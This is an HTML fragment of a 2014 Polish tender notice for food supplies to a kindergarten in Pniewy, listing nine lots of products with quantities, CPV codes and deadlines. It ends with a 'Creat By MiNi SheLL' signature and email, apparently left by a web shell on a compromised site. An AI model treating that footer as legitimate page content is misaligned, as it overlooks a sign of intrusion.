</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca dołączy do oferty następujące dokumenty: 
1) Formularz oferty - wzór oferty stanowi załącznik nr 1 do siwz,
2) odpowiednie pełnomocnictwa - w sytuacjach określonych w rozdziale IX pkt 6 siwz oraz w przypadku składania ofert wspólnych,
3) oświadczenia o równoważności produktów wraz z opisem - w przypadku składania ofert równoważnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mis.pniewy.wlkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miś w Pniewach
ul. Dworcowa 23
62-045 Pniewy
biuro Intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2014 godzina 09:00, miejsce: Przedszkole Miś w Pniewach
ul. Dworcowa 23
62-045 Pniewy
biuro Dyrektora Przedszkola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.01.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tabela  A  WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka  miary Ilość Marchew luzem kg 120	Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek 120 Sałata  szt. 120 Sałata lodowa	szt. 50 Por korzeń kg 50 Cebula biała kg 100 Buraki czerwone kg 200 Seler korzeń kg 100 Jabłka lobo  kg 200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg   3000 Kapusta czerwona świeża  kg 100 Kapusta pekińska  szt. 70 Kalafior świeży  szt. 50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg 150 Kapusta biała główka kg kg 200  Pieczarki świeże luz kg  40 Banan kg 100 Papryka konserwowa 0,9l szt. szt. 40 Truskawki kg 60 Papryka świeża  kg 10 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg 100 cytryna kg  20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tabela B  MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Kości od schabu kg 300 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg 200 Szynka wieprzowa wędzona got. kg 100 Mięso wieprzowe mielone drobne kg  200 Mielonka zapiekana wieprzowa kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa gruba kg250 Udka z kurczaka kg150 Karkówka b  k wieprzowa kg150 Kaszanka kg100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tabela C  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.130	Truskawki mrożone 2,5  kg op.. szt.150	Mieszanka warzywna paski 2,5  kg op. szt. 150 Brokuły mrożone 2,5  kg op.szt.80 Zupa pieczarkowa, 2,5  kg op.szt.100   Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op.szt.160 Kalafior, 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420  Groszek zielony, 2,5  kg op. szt. 100 Marchew z groszkiem, 2,5  kg op. szt. 100 Wiśnie drążone 2,5  kg op. szt. 40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 kompotowe szt.150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tabela D   PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość	Mąka pszenna 500  kg 250 Ryż długoziarnisty kg150 Kawa zbożowa (typu inka)150 g  szt.30 Kasza jęczmienna średnia luz kg50 Kasza manna 1kg kg30 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.800 Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1200 Krem do smarowania orzech.-czek. 230 g szt. 180 Miód pszczeli nektarowy lipowy 0,4 kg szt. 100 Dżemy różne smaki 0,30 l  wysokosłodzony szt. 80 Kakao naturalne 150 g op. szt. 10 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op.szt. 50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l szt. 50 Galaretka do ciast różne smaki  0,75g szt  240 Proszek do pieczenia 18g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt. 30 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt. 40 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml	szt. 50 Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt 50 Cynamon 20 g szt. 20 Ziele angielskie 15g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l szt.200 Szprot w pomidorach puszka  170g op. szt. 60 Paprykarz szczecinecki 135g op. szt 60 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt 300 Imbir 20 g szt. 30 Czosnek granulowany 20 g szt. 30 Bazylia 10 g szt. 30 Oregano 10 g szt. 30 herbaty ziołowe 4x30 g - 20 torebek szt. 30 ryż ciemny kg 30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140 Papryka słodka syp. 0,5kgszt.2 Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt. 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Tabela E   SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op. szt. 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  bez czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280  Figurki czekoladowe - zajączki 80g szt. 300 Jajka czekoladowe szt. 300 Wafle śmietankowe luz kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tabela F  PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg litewski  krojony szt. 500 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg	szt. 600	Pączki szt. 600	Bułka tarta 1 kg	szt. 40 Babka okrągła średnia 0,5kg szt. 120 Drożdżówki szt. 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Tabela G     NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l  szt. 130 Śmietana zakwaszana 12% 180g szt. 50Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie szt. 2000 Mleko 2% karton 1 l op. szt. 1200 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50 Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 115g szt. 1500 Śmietanka kremowa 30% 0,5l szt. 30 Margaryna zwykła 250g  szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Tabela H   MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Sos pieczeniowy 3 kg.op. szt. 5 Majeranek 0,30kg op. Szt. 5 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3 Makaron drobny gwiazdki 100% pszenicy Durum 5kg kg 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron koła 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Koncentrat pomarańczowy 5l szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tabela  I   RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa towaru Jednostka miary	Ilość Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg150 Ryby wiadro płaty śledziowe ocet 2kg. op.szt.60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com